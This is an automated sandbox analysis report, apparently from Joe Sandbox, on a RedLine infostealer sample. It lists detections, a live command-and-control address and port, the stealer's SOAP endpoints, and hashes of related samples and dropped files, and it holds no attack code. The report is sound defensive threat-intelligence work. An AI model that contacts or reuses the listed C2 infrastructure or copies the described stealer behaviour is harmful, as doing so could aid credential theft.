                      3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe76%ReversingLabsByteCode-MSIL.Infostealer.RedLine
                      3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe100%AviraHEUR/AGEN.1305500
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://103.84.89.222:30%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.ip.sb.cdn.cloudflare.net
                      104.26.13.31
                      truefalse
                        high
                        api.ip.sb
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          http://103.84.89.222:33791/false
                            high
                            https://api.ip.sb/geoipfalse
                              high
                              103.84.89.222:33791false
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://ipinfo.io/ip%appdata%3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exefalse
                                  high
                                  https://duckduckgo.com/chrome_newtabtmp21BF.tmp.0.dr, tmpE7CE.tmp.0.dr, tmpE7DE.tmp.0.dr, tmp21D0.tmp.0.dr, tmp21E1.tmp.0.dr, tmp219F.tmp.0.dr, tmp21F2.tmp.0.dr, tmp219E.tmp.0.dr, tmp21CF.tmp.0.dr, tmpE7BC.tmp.0.dr, tmpE7CD.tmp.0.dr, tmpE7EF.tmp.0.drfalse
                                    high
                                    https://duckduckgo.com/ac/?q=tmp21BF.tmp.0.dr, tmpE7CE.tmp.0.dr, tmpE7DE.tmp.0.dr, tmp21D0.tmp.0.dr, tmp21E1.tmp.0.dr, tmp219F.tmp.0.dr, tmp21F2.tmp.0.dr, tmp219E.tmp.0.dr, tmp21CF.tmp.0.dr, tmpE7BC.tmp.0.dr, tmpE7CD.tmp.0.dr, tmpE7EF.tmp.0.drfalse
                                      high
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icotmp21BF.tmp.0.dr, tmpE7CE.tmp.0.dr, tmpE7DE.tmp.0.dr, tmp21D0.tmp.0.dr, tmp21E1.tmp.0.dr, tmp219F.tmp.0.dr, tmp21F2.tmp.0.dr, tmp219E.tmp.0.dr, tmp21CF.tmp.0.dr, tmpE7BC.tmp.0.dr, tmpE7CD.tmp.0.dr, tmpE7EF.tmp.0.drfalse
                                        high
                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.0000000003401000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://tempuri.org/Endpoint/CheckConnectResponse3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.0000000003401000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://schemas.datacontract.org/2004/07/3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.0000000003565000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.0000000003401000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://tempuri.org/Endpoint/EnvironmentSettings3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.0000000003401000.00000004.00000800.00020000.00000000.sdmp, 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.0000000003450000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://api.ip.sb/geoip%USERPEnvironmentROFILE%3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exefalse
                                                    high
                                                    http://schemas.xmlsoap.org/soap/envelope/3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.0000000003450000.00000004.00000800.00020000.00000000.sdmp, 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.0000000003474000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://103.84.89.222:337913368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.0000000003401000.00000004.00000800.00020000.00000000.sdmp, 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.00000000035B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmp21BF.tmp.0.dr, tmpE7CE.tmp.0.dr, tmpE7DE.tmp.0.dr, tmp21D0.tmp.0.dr, tmp21E1.tmp.0.dr, tmp219F.tmp.0.dr, tmp21F2.tmp.0.dr, tmp219E.tmp.0.dr, tmp21CF.tmp.0.dr, tmpE7BC.tmp.0.dr, tmpE7CD.tmp.0.dr, tmpE7EF.tmp.0.drfalse
                                                          high
                                                          http://tempuri.org/3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.00000000035B9000.00000004.00000800.00020000.00000000.sdmp, 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.00000000035BD000.00000004.00000800.00020000.00000000.sdmp, 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.0000000003474000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://tempuri.org/Endpoint/CheckConnect3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.0000000003401000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmp21BF.tmp.0.dr, tmpE7CE.tmp.0.dr, tmpE7DE.tmp.0.dr, tmp21D0.tmp.0.dr, tmp21E1.tmp.0.dr, tmp219F.tmp.0.dr, tmp21F2.tmp.0.dr, tmp219E.tmp.0.dr, tmp21CF.tmp.0.dr, tmpE7BC.tmp.0.dr, tmpE7CD.tmp.0.dr, tmpE7EF.tmp.0.drfalse
                                                                high
                                                                http://103.84.89.222:33368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.00000000036B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://www.ecosia.org/newtab/tmp21BF.tmp.0.dr, tmpE7CE.tmp.0.dr, tmpE7DE.tmp.0.dr, tmp21D0.tmp.0.dr, tmp21E1.tmp.0.dr, tmp219F.tmp.0.dr, tmp21F2.tmp.0.dr, tmp219E.tmp.0.dr, tmp21CF.tmp.0.dr, tmpE7BC.tmp.0.dr, tmpE7CD.tmp.0.dr, tmpE7EF.tmp.0.drfalse
                                                                  high
                                                                  http://tempuri.org/Endpoint/VerifyUpdateResponse3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.0000000003401000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://tempuri.org/Endpoint/SetEnviron3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.00000000036B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://tempuri.org/Endpoint/SetEnvironment3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.00000000036B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://tempuri.org/Endpoint/SetEnvironmentResponse3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.0000000003401000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://tempuri.org/Endpoint/GetUpdates3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.00000000035B9000.00000004.00000800.00020000.00000000.sdmp, 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.00000000035BD000.00000004.00000800.00020000.00000000.sdmp, 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.000000000347A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://ac.ecosia.org/autocomplete?q=tmp21BF.tmp.0.dr, tmpE7CE.tmp.0.dr, tmpE7DE.tmp.0.dr, tmp21D0.tmp.0.dr, tmp21E1.tmp.0.dr, tmp219F.tmp.0.dr, tmp21F2.tmp.0.dr, tmp219E.tmp.0.dr, tmp21CF.tmp.0.dr, tmpE7BC.tmp.0.dr, tmpE7CD.tmp.0.dr, tmpE7EF.tmp.0.drfalse
                                                                              high
                                                                              https://api.ipify.orgcookies//settinString.Removeg3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exefalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressing3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.0000000003401000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://tempuri.org/Endpoint/GetUpdatesResponse3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.0000000003401000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmp21BF.tmp.0.dr, tmpE7CE.tmp.0.dr, tmpE7DE.tmp.0.dr, tmp21D0.tmp.0.dr, tmp21E1.tmp.0.dr, tmp219F.tmp.0.dr, tmp21F2.tmp.0.dr, tmp219E.tmp.0.dr, tmp21CF.tmp.0.dr, tmpE7BC.tmp.0.dr, tmpE7CD.tmp.0.dr, tmpE7EF.tmp.0.drfalse
                                                                                      high
                                                                                      http://tempuri.org/Endpoint/EnvironmentSettingsResponse3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.0000000003401000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://tempuri.org/Endpoint/VerifyUpdate3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.0000000003401000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://tempuri.org/03368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.0000000003401000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.0000000003401000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmp21BF.tmp.0.dr, tmpE7CE.tmp.0.dr, tmpE7DE.tmp.0.dr, tmp21D0.tmp.0.dr, tmp21E1.tmp.0.dr, tmp219F.tmp.0.dr, tmp21F2.tmp.0.dr, tmp219E.tmp.0.dr, tmp21CF.tmp.0.dr, tmpE7BC.tmp.0.dr, tmpE7CD.tmp.0.dr, tmpE7EF.tmp.0.drfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/soap/actor/next3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.0000000003401000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs
                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  104.26.13.31
                                                                                                  api.ip.sb.cdn.cloudflare.netUnited States
                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                  103.84.89.222
                                                                                                  unknownHong Kong
                                                                                                  132813AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHKtrue
                                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                                  Analysis ID:1619105
                                                                                                  Start date and time:2025-02-19 15:37:12 +01:00
                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                  Overall analysis duration:0h 3m 44s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                  Number of analysed new started processes analysed:5
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Sample name:3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@2/117@1/2
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  • Number of executed functions: 67
                                                                                                  • Number of non-executed functions: 12
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .exe
                                                                                                  • Stop behavior analysis, all processes terminated
                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.253.45
                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  TimeTypeDescription
                                                                                                  09:38:10API Interceptor78x Sleep call for process: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe modified
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  104.26.13.31VKJITO.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                  • ip.sb/
                                                                                                  103.84.89.222Implosions.exeGet hashmaliciousRedLineBrowse
                                                                                                  • 103.84.89.222:33791/
                                                                                                  TxTPu961er.exeGet hashmaliciousAmadey, RedLine, StealcBrowse
                                                                                                  • 103.84.89.222:33791/
                                                                                                  Ryay9q4aDy.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, RedLineBrowse
                                                                                                  • 103.84.89.222:33791/
                                                                                                  random.exeGet hashmaliciousScreenConnect Tool, Amadey, Healer AV Disabler, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                                                  • 103.84.89.222:33791/
                                                                                                  random.exeGet hashmaliciousRedLineBrowse
                                                                                                  • 103.84.89.222:33791/
                                                                                                  random.exeGet hashmaliciousAmadey, Credential Flusher, GCleaner, KeyLogger, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                                                                                  • 103.84.89.222:33791/
                                                                                                  random.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RedLine, Vidar, XWorm, XmrigBrowse
                                                                                                  • 103.84.89.222:33791/
                                                                                                  L8ChrKrbqV.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                  • 103.84.89.222:33791/
                                                                                                  random.exeGet hashmaliciousAmadey, LummaC Stealer, RedLineBrowse
                                                                                                  • 103.84.89.222:33791/
                                                                                                  random.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                  • 103.84.89.222:33791/
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  api.ip.sb.cdn.cloudflare.netImplosions.exeGet hashmaliciousRedLineBrowse
                                                                                                  • 104.26.12.31
                                                                                                  TxTPu961er.exeGet hashmaliciousAmadey, RedLine, StealcBrowse
                                                                                                  • 172.67.75.172
                                                                                                  NWzeEUBQ7F.exeGet hashmaliciousRedLineBrowse
                                                                                                  • 172.67.75.172
                                                                                                  A18OkaGxHz.exeGet hashmaliciousRedLineBrowse
                                                                                                  • 104.26.12.31
                                                                                                  Uv4EriqDCj.exeGet hashmaliciousRedLineBrowse
                                                                                                  • 104.26.12.31
                                                                                                  nePPsHIZ1m.exeGet hashmaliciousRedLineBrowse
                                                                                                  • 104.26.13.31
                                                                                                  CxfUzjqyxz.exeGet hashmaliciousRedLineBrowse
                                                                                                  • 104.26.13.31
                                                                                                  1w5RpHuliE.exeGet hashmaliciousAmadey, GCleaner, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoader, VidarBrowse
                                                                                                  • 172.67.75.172
                                                                                                  SecuriteInfo.com.Win32.Evo-gen.12305.7160.exeGet hashmaliciousRedLineBrowse
                                                                                                  • 104.26.13.31
                                                                                                  rH3TpuMpZn.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Quasar, RedLine, VidarBrowse
                                                                                                  • 104.26.12.31
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHKImplosions.exeGet hashmaliciousRedLineBrowse
                                                                                                  • 103.84.89.222
                                                                                                  TxTPu961er.exeGet hashmaliciousAmadey, RedLine, StealcBrowse
                                                                                                  • 103.84.89.222
                                                                                                  Mc3FDUMnVz.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                                                                                  • 103.214.142.152
                                                                                                  SecuriteInfo.com.Win32.Evo-gen.12305.7160.exeGet hashmaliciousRedLineBrowse
                                                                                                  • 103.214.142.152
                                                                                                  rH3TpuMpZn.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Quasar, RedLine, VidarBrowse
                                                                                                  • 103.214.142.152
                                                                                                  Ryay9q4aDy.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, RedLineBrowse
                                                                                                  • 103.84.89.222
                                                                                                  random.exeGet hashmaliciousAmadey, AsyncRAT, LummaC Stealer, PureLog Stealer, RedLine, Stealc, VidarBrowse
                                                                                                  • 103.84.89.222
                                                                                                  E41ACurBrc.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RedLine, VidarBrowse
                                                                                                  • 103.84.89.222
                                                                                                  pEzwmYoSUs.exeGet hashmaliciousScreenConnect Tool, Amadey, PureLog Stealer, RedLine, Vidar, zgRATBrowse
                                                                                                  • 103.84.89.222
                                                                                                  random.exeGet hashmaliciousRedLineBrowse
                                                                                                  • 103.84.89.222
                                                                                                  CLOUDFLARENETUSOr_E7amento_US77.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.87.137
                                                                                                  rSlutelementer.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 104.21.80.1
                                                                                                  Bank Transfer Form.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 104.21.80.1
                                                                                                  https://morlune.com/Get hashmaliciousUnknownBrowse
                                                                                                  • 104.21.33.223
                                                                                                  QUOTATION_JANQUOTE312025#U00faPDF.scrGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.48.1
                                                                                                  b5.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 1.1.1.1
                                                                                                  b6.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 1.1.1.1
                                                                                                  b3.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 1.1.1.1
                                                                                                  b2.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 1.1.1.1
                                                                                                  b1.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 1.1.1.1
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  54328bd36c14bd82ddaa0c04b25ed9adrSlutelementer.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 104.26.13.31
                                                                                                  Bank Transfer Form.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 104.26.13.31
                                                                                                  QUOTATION_JANQUOTE312025#U00faPDF.scrGet hashmaliciousUnknownBrowse
                                                                                                  • 104.26.13.31
                                                                                                  000027_A-000032.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 104.26.13.31
                                                                                                  T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 104.26.13.31
                                                                                                  redline stealer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                  • 104.26.13.31
                                                                                                  1739956023252a745b42b553cdf7d78ac9ddd87cf1def79e972fdda0a89cc59317777d06c5280.dat-decoded.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 104.26.13.31
                                                                                                  SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 104.26.13.31
                                                                                                  DHl-Global-Documents.jsGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 104.26.13.31
                                                                                                  INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 104.26.13.31
                                                                                                  No context
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2666
                                                                                                  Entropy (8bit):5.345804351520589
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHpHt1qHxLHjH4:vq5qxqdqolqztYqh3oPtI6mq7qoT5JNV
                                                                                                  MD5:90757169D333CB9247B01FB0CAF14023
                                                                                                  SHA1:C47A0AA0CBC960527EA4FA7F61AC1D08B56C23A5
                                                                                                  SHA-256:C04472992BF7CF58327D947D334F1105C14C5CF0D2DD0DF7E7873CAADE0EC61D
                                                                                                  SHA-512:A49B90272EC353DE49C508AF75C509D14A18EA50ABD1CD49BF5313A708CB9654A543E3340C74978B5756A66EF291132E93931853CAD7CC8C85450BB64A318031
                                                                                                  Malicious:true
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.705615236042988
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                  MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                  SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                  SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                  SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                  Malicious:false
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.695685570184741
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                  Malicious:false
                                                                                                  Reputation:moderate, very likely benign file
